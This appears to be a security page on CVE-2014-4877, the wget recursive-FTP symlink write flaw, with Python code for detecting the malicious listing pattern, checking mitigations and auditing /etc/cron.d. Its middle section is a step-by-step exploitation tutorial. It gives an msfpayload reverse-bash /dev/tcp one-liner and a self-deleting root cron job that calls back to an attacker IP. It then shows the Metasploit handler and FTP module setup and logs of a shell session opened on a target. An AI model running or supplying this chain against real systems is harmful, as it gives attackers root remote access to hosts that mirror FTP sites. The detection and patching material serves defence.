Wget FTP Attack Vulnerability


Intro

The flaw (CVE-2014-4877) is triggered when wget, fetching recursively over FTP (-r or -m), receives a directory listing that includes a symlink followed by a directory with the same name: wget creates the symlink locally and then descends into the same-named directory through it, so the files it saves land wherever the server-chosen symlink points.
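The trigger pattern above is visible in the raw LIST response, which makes it checkable on the client or at an FTP-aware proxy before any file is written. The following parser is an added example written for this page, not code from wget or the page's author; the sample listing is constructed (the directory name is the one that appears in the page's Metasploit log, the link target is assumed), and the listing format is the Unix "ls -l" style that wget parses.

```python
"""Flag FTP directory listings that show the CVE-2014-4877 trigger pattern:
a symlink entry followed by a directory entry with the same name."""
import re

# Constructed sample listing (added illustration, not captured server output).
SAMPLE_LISTING = """\
drwxr-xr-x 2 0 0 4096 Oct 31 04:13 .
drwxr-xr-x 2 0 0 4096 Oct 31 04:13 ..
lrwxrwxrwx 1 0 0   12 Oct 31 04:13 4BDZLdr5AdsK -> /etc/cron.d
drwxr-xr-x 2 0 0 4096 Oct 31 04:13 4BDZLdr5AdsK
-rw-r--r-- 1 0 0  183 Oct 31 04:13 README
"""

# Unix-style LIST line: mode, links, owner, group, size, month, day, time/year, name.
LINE_RE = re.compile(
    r"^(?P<mode>[-dl][rwxsStT-]{9})\s+\d+\s+\S+\s+\S+\s+\d+\s+"
    r"\S+\s+\d+\s+[\d:]+\s+(?P<name>.+?)(?: -> (?P<target>.+))?$"
)


def parse_listing(listing):
    """Return (kind, name, link_target) tuples for each parseable LIST line."""
    entries = []
    for raw in listing.splitlines():
        m = LINE_RE.match(raw.rstrip())
        if not m:
            continue  # skip lines we cannot parse rather than guess at them
        kind = {"d": "dir", "l": "symlink"}.get(m.group("mode")[0], "file")
        entries.append((kind, m.group("name"), m.group("target")))
    return entries


def find_symlink_dir_collisions(listing):
    """Return (name, link_target) for names listed first as a symlink and
    later as a directory, i.e. the order that makes vulnerable wget follow
    the link when it writes the directory's contents."""
    seen_symlinks = {}
    hits = []
    for kind, name, target in parse_listing(listing):
        if kind == "symlink":
            seen_symlinks[name] = target
        elif kind == "dir" and name in seen_symlinks:
            hits.append((name, seen_symlinks[name]))
    return hits


if __name__ == "__main__":
    for name, target in find_symlink_dir_collisions(SAMPLE_LISTING):
        print(f"suspicious listing: symlink {name!r} -> {target!r} shadowed by a directory")
```

A listing that contains a symlink whose target is an absolute path outside the mirror root is worth flagging on its own; the collision check above is the narrower test for this CVE.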

Fix

Upgrade to wget version 1.16 or a package that has backported the CVE-2014-4877 patch. If you use a distribution that does not ship a patched version of wget, you can mitigate the issue by adding the line "retr-symlinks=on" to either /etc/wgetrc or ~/.wgetrc. With that setting wget retrieves the file a symlink points to instead of creating a local symlink, so the server can no longer redirect writes.
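The two conditions in the fix can be checked mechanically. This is an added example for this page, not code from wget or the page's author: it parses the "wget --version" banner, reads the two wgetrc files, and applies the same rules wget uses for boolean settings (on/1/yes, with dashes and underscores in the option name treated alike). One caveat a version check cannot cover: a distribution backport keeps the old version string, so for such packages the function deliberately reports "not mitigated" unless the retr-symlinks setting is present, and the package changelog has to be consulted instead.

```python
"""Check a host against the CVE-2014-4877 mitigations: wget >= 1.16, or
retr-symlinks=on in /etc/wgetrc or ~/.wgetrc."""
import os
import re
import subprocess

FIXED_VERSION = (1, 16)  # wget 1.16 made retr-symlinks=on the default for FTP


def parse_wget_version(banner):
    """Extract (major, minor) from 'wget --version' output; None if absent."""
    m = re.search(r"GNU Wget (\d+)\.(\d+)", banner)
    return (int(m.group(1)), int(m.group(2))) if m else None


def wgetrc_has_retr_symlinks(text):
    """True if the wgetrc text ends up with retr-symlinks on (last one wins)."""
    value = None
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()  # drop comments
        if not line or "=" not in line:
            continue
        key, _, val = line.partition("=")
        # wget ignores case and treats '-' and '_' alike in option names
        if key.strip().lower().replace("_", "-") == "retr-symlinks":
            value = val.strip().lower()
    return value in ("on", "1", "yes")


def is_mitigated(version_banner, rc_texts):
    """Decide from a version banner and the contents of the wgetrc files."""
    version = parse_wget_version(version_banner)
    if version is not None and version >= FIXED_VERSION:
        return True
    # Backported packages are not detectable here; only the rc setting counts.
    return any(wgetrc_has_retr_symlinks(t) for t in rc_texts)


def check_local_host():
    """Run on a real host: reads wget's banner and the two wgetrc files.
    Note that ~/.wgetrc is the one of the user running wget (root for cron)."""
    try:
        banner = subprocess.run(
            ["wget", "--version"], capture_output=True, text=True
        ).stdout
    except FileNotFoundError:
        return True  # no wget installed, nothing to mitigate
    texts = []
    for path in ("/etc/wgetrc", os.path.expanduser("~/.wgetrc")):
        try:
            with open(path) as fh:
                texts.append(fh.read())
        except OSError:
            pass
    return is_mitigated(banner, texts)


if __name__ == "__main__":
    print("mitigated" if check_local_host() else "NOT mitigated: upgrade or set retr-symlinks=on")
```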

Exploitation tutorial

Create a cron job file script

msfpayload

msfpayload cmd/unix/reverse_bash LHOST=172.16.68.132 LPORT=4444 R

0<&66-;exec 66<>/dev/tcp/172.16.68.132/4444;sh <&66 >&66 2>&66r

cronshell

cat cronshell

PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
* * * * * root bash -c '0<&63-;exec 63<>/dev/tcp/172.16.68.132/4444;sh <&63 >&63 2>&63'; rm -f /etc/cron.d/cronshell

Configure the local listener

locallisten

msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD cmd/unix/reverse_bash
PAYLOAD => cmd/unix/reverse_bash
msf exploit(handler) > set LHOST 172.16.68.132
LHOST => 172.16.68.132
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > run -j
[*] Exploit running as background job.

[*] Started reverse handler on 172.16.68.132:4444

[*] Starting the payload handler...
msf exploit(handler) >

Set up an anonymous malicious FTP server

ftp

msf exploit(handler) > use auxiliary/server/wget_symlink_file_write
msf auxiliary(wget_symlink_file_write) > set TARGET_FILE /etc/cron.d/cronshell
TARGET_FILE => /etc/cron.d/cronshell
msf auxiliary(wget_symlink_file_write) > set TARGET_DATA file:cronshell
TARGET_DATA => file:cronshell
msf auxiliary(wget_symlink_file_write) > set SRVPORT 21
SRVPORT => 21
msf auxiliary(wget_symlink_file_write) > run
[*] Auxiliary module execution completed

[+] Targets should run: $ wget -m ftp://172.16.68.132:21/
[*] Server started.

Exploiting the target

target

[*] Server started.
msf auxiliary(wget_symlink_file_write) > [*] 172.16.17.119:56396 Logged in with user 'anonymous' and password 'anonymous'...
[*] 172.16.17.119:56396 -> LIST -a
[*] 172.16.17.119:56396 -> CWD /4BDZLdr5AdsK
[*] 172.16.17.119:56396 -> LIST -a
[*] 172.16.17.119:56396 -> RETR cronshell
[+] 172.16.17.119:56396 Hopefully wrote 183 bytes to /etc/cron.d/cronshell
[*] Command shell session 1 opened (172.16.68.132:4444 -> 172.16.17.119:54412) at 2014-10-31 04:13:01 -0400
sessions

Active sessions
===============

Id  Type        Information  Connection
--  ----        -----------  ----------
1   shell unix               172.16.68.132:4444 -> 172.16.17.119:54412 (172.16.17.119)

msf auxiliary(wget_symlink_file_write) > sessions -i 1
[*] Starting interaction with 1...

ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
    valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host
    valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 00:0c:29:21:5b:1c brd ff:ff:ff:ff:ff:ff
    inet 172.16.17.119/24 brd 172.16.17.255 scope global eth0
    valid_lft forever preferred_lft forever

Exploitation conditions

The target machine must have cron (crontab) enabled and must download from the attacker's FTP server with wget in recursive mode.
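Because the write target in this walkthrough is /etc/cron.d, the dropped file also leaves a clear artifact on the host. The audit below is an added example for this page, not code from the page's author or from Metasploit: it parses system-crontab lines (five schedule fields, user, command) and flags the two traits the page's cronshell file shows, a bash /dev/tcp network redirection and a job that deletes its own cron file; the sample entries are constructed, with a harmless placeholder command and a documentation address in place of the page's payload.

```python
"""Audit /etc/cron.d-style files for the indicators left by a dropped
reverse-shell job: /dev/tcp redirection and self-deleting entries."""
import os
import re

# Constructed sample files (added illustration, not captured from a host).
SAMPLE_CROND = {
    "/etc/cron.d/cronshell": (
        "PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n"
        "* * * * * root bash -c 'echo > /dev/tcp/192.0.2.10/4444'; rm -f /etc/cron.d/cronshell\n"
    ),
    "/etc/cron.d/logrotate": "15 2 * * * root /usr/sbin/logrotate /etc/logrotate.conf\n",
}

# System crontab line: five schedule fields (or @reboot etc.), user, command.
CRON_LINE_RE = re.compile(r"^(?P<sched>(?:\S+\s+){5}|@\w+\s+)(?P<user>\S+)\s+(?P<cmd>.+)$")


def audit_crond_entry(path, text):
    """Return (line_number, reason) findings for one cron.d file's contents."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#") or re.match(r"^\w+=", line):
            continue  # blank, comment, or environment assignment such as PATH=
        m = CRON_LINE_RE.match(line)
        if not m:
            findings.append((lineno, "unparseable cron line"))
            continue
        cmd = m.group("cmd")
        if re.search(r"/dev/(tcp|udp)/", cmd):
            findings.append((lineno, "bash network redirection (/dev/tcp or /dev/udp)"))
        if re.search(r"\brm\s+(?:-\w+\s+)*" + re.escape(path) + r"(?!\S)", cmd):
            findings.append((lineno, "job deletes its own cron file"))
        if re.search(r"base64\s+(?:-d|--decode)", cmd):
            findings.append((lineno, "base64-decoded command"))
    return findings


def audit_crond_dir(dirpath="/etc/cron.d"):
    """Run the audit over every file in a real cron.d directory."""
    results = {}
    for name in sorted(os.listdir(dirpath)):
        path = os.path.join(dirpath, name)
        if os.path.isfile(path):
            with open(path, errors="replace") as fh:
                results[path] = audit_crond_entry(path, fh.read())
    return results


if __name__ == "__main__":
    for path, text in SAMPLE_CROND.items():
        for lineno, reason in audit_crond_entry(path, text):
            print(f"{path}:{lineno}: {reason}")
```

A file that is created in /etc/cron.d and removed a minute later by its own job will be gone before a periodic scan runs, so on a host that matters pair this with file-integrity monitoring or an audit rule on that directory.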
